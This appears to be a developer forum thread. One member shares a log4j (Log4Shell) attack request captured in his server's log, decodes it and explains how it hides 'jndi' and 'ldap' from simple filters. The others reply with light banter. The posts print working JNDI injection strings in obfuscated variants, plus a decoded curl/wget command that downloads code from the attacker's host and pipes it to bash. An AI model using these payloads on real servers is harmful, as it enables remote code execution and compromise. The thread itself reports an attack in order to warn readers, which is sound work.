Cuter by the day....
-
The log4j scoundrels are getting cuter. Here's an example request from my forensic log
GET /?x=${jndi%3aldap%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1|Host:138.130.164.133%3a443|User-Agent:${${%3a%3a-j}${%3a%3a-n}${%3a%3a-d}${%3a%3a-i}%3a${%3a%3a-l}${%3a%3a-d}${%3a%3a-a}${%3a%3a-p}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Referer:${jndi%3a${lower%3al}${lower%3ad}${lower%3aa}${lower%3ap}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Accept-Encoding:gzip|Connection:close
To make it a bit more readable, here it is with %3a => : and split into individual headers (line splitting is CP's in both blocks)
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1
Host:138.130.164.133:443
User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Accept-Encoding:gzip
Connection:closeThe base64 "KGN1..." decodes to
(curl -s 195.54.160.149:5874/138.130.164.133:443||wget -q -O- 195.54.160.149:5874/138.130.164.133:443)|bash
138.130.164.133 was my public IPv4 address at the time. Note the cutesy ways they are hiding "jndi" and "ldap" from simple text-string filters. Needless to say, it got a short sharp 403 response (as does anything that hasn't got a Host header with a real URL I recognise). APNIC tells me that 195.54.160.149 belongs somewhere in Russia. Surprise surprise... And yes, that's also the source address of the request.
Software rusts. Simon Stephenson, ca 1994.
-
The log4j scoundrels are getting cuter. Here's an example request from my forensic log
GET /?x=${jndi%3aldap%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1|Host:138.130.164.133%3a443|User-Agent:${${%3a%3a-j}${%3a%3a-n}${%3a%3a-d}${%3a%3a-i}%3a${%3a%3a-l}${%3a%3a-d}${%3a%3a-a}${%3a%3a-p}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Referer:${jndi%3a${lower%3al}${lower%3ad}${lower%3aa}${lower%3ap}%3a//195.54.160.149%3a12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}|Accept-Encoding:gzip|Connection:close
To make it a bit more readable, here it is with %3a => : and split into individual headers (line splitting is CP's in both blocks)
GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=} HTTP/1.1
Host:138.130.164.133:443
User-Agent:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Referer:${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTMwLjE2NC4xMzM6NDQzfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzOC4xMzAuMTY0LjEzMzo0NDMpfGJhc2g=}
Accept-Encoding:gzip
Connection:closeThe base64 "KGN1..." decodes to
(curl -s 195.54.160.149:5874/138.130.164.133:443||wget -q -O- 195.54.160.149:5874/138.130.164.133:443)|bash
138.130.164.133 was my public IPv4 address at the time. Note the cutesy ways they are hiding "jndi" and "ldap" from simple text-string filters. Needless to say, it got a short sharp 403 response (as does anything that hasn't got a Host header with a real URL I recognise). APNIC tells me that 195.54.160.149 belongs somewhere in Russia. Surprise surprise... And yes, that's also the source address of the request.
Software rusts. Simon Stephenson, ca 1994.
That's very concerning indeed.... Could it be I am getting old? I got absolutely no clue what I am looking at! :omg: :rolleyes: :laugh:
A new .NET Serializer All in one Menu-Ribbon Bar Taking over the world since 1371!
-
That's very concerning indeed.... Could it be I am getting old? I got absolutely no clue what I am looking at! :omg: :rolleyes: :laugh:
A new .NET Serializer All in one Menu-Ribbon Bar Taking over the world since 1371!
That is a dump of an incoming request (after TLS decryption so it's not complete gobbledegook). My point was that the first round of log4j attacks had
jndi:ldapin clear text, but now they are further encoding it to bypass naive filters. As I understand it, the vulnerability arises from log4j doing JNDI lookups on various fields in the request. And be careful mentioning "getting old" in these parts. I'm only a few weeks shy of 3/4 of a century. Cheers, PeterSoftware rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
-
That is a dump of an incoming request (after TLS decryption so it's not complete gobbledegook). My point was that the first round of log4j attacks had
jndi:ldapin clear text, but now they are further encoding it to bypass naive filters. As I understand it, the vulnerability arises from log4j doing JNDI lookups on various fields in the request. And be careful mentioning "getting old" in these parts. I'm only a few weeks shy of 3/4 of a century. Cheers, PeterSoftware rusts. Simon Stephenson, ca 1994. So does this signature. me, 2012
ha... some of the data was related to the currently much talked about vulnerability, I see... Mmm.. I am only at 2/4+ :laugh:
A new .NET Serializer All in one Menu-Ribbon Bar Taking over the world since 1371!